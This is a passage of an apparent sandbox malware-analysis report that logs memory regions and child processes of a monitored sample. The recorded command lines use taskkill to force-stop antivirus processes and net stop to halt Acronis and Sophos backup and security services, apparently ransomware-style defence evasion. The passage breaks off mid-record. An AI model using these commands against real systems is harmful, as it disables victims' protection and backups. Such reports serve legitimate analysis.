mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3441 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3442 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3443 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 3444 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3445 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3446 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3447 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3448 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 3449 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3450 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 324 os_tid = 0xe40 Thread: id = 354 os_tid = 0xf04 Thread: id = 357 os_tid = 0xf18 Thread: id = 362 os_tid = 0xf30 Thread: id = 363 os_tid = 0xf34 Process: id = "45" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x6ed39000" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM CNTAoSMgr.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3451 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3452 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3453 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3454 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3455 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3456 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3457 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3458 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 3459 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3460 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3461 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3462 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3463 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3464 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3465 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 328 os_tid = 0xe5c Thread: id = 356 os_tid = 0xf0c Thread: id = 369 os_tid = 0xf68 Thread: id = 370 os_tid = 0xf7c Thread: id = 371 os_tid = 0xf80 Process: id = "46" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x28e58000" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM Ntrtscan.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3515 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3516 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3517 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3518 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3519 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3520 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3521 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3522 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 3523 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3524 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3525 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3526 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3527 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3528 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3529 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 345 os_tid = 0xebc Thread: id = 366 os_tid = 0xf44 Thread: id = 372 os_tid = 0xf84 Thread: id = 373 os_tid = 0xf88 Thread: id = 374 os_tid = 0xf8c Process: id = "47" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x28477000" os_pid = "0xee0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM mbamtray.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3530 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3531 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3532 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3533 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3534 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3535 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3536 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3537 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 3538 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3539 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3540 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3541 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3542 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 3543 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3544 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 350 os_tid = 0xee4 Thread: id = 375 os_tid = 0xf90 Thread: id = 376 os_tid = 0xfa0 Thread: id = 379 os_tid = 0xfb8 Thread: id = 380 os_tid = 0xfbc Process: id = "48" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x1b497000" os_pid = "0xf1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Acronis VSS Provider\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3647 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3648 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3649 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3650 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3651 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3652 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3653 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3654 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 3655 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3656 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3657 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3658 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3659 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3660 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3661 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 358 os_tid = 0xf20 Process: id = "49" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x255b7000" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Enterprise Client Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3662 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3663 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3664 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3665 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3666 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3667 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3668 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3669 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 3670 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3671 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3672 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3673 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3674 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 3675 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3676 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3692 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3693 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3694 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3695 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3696 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 3697 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3698 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3699 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 3700 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 3701 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3702 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3703 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3704 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3705 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3706 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3707 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3708 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3709 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3710 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3711 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 364 os_tid = 0xf3c Process: id = "50" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x26cd7000" os_pid = "0xf5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos Agent\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3677 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3678 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3679 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3680 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3681 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3682 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3683 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3684 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 3685 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3686 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3687 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3688 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3689 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3690 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3691 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 367 os_tid = 0xf60 Process: id = "51" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x250f7000" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos AutoUpdate Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3712 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3713 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3714 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3715 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = 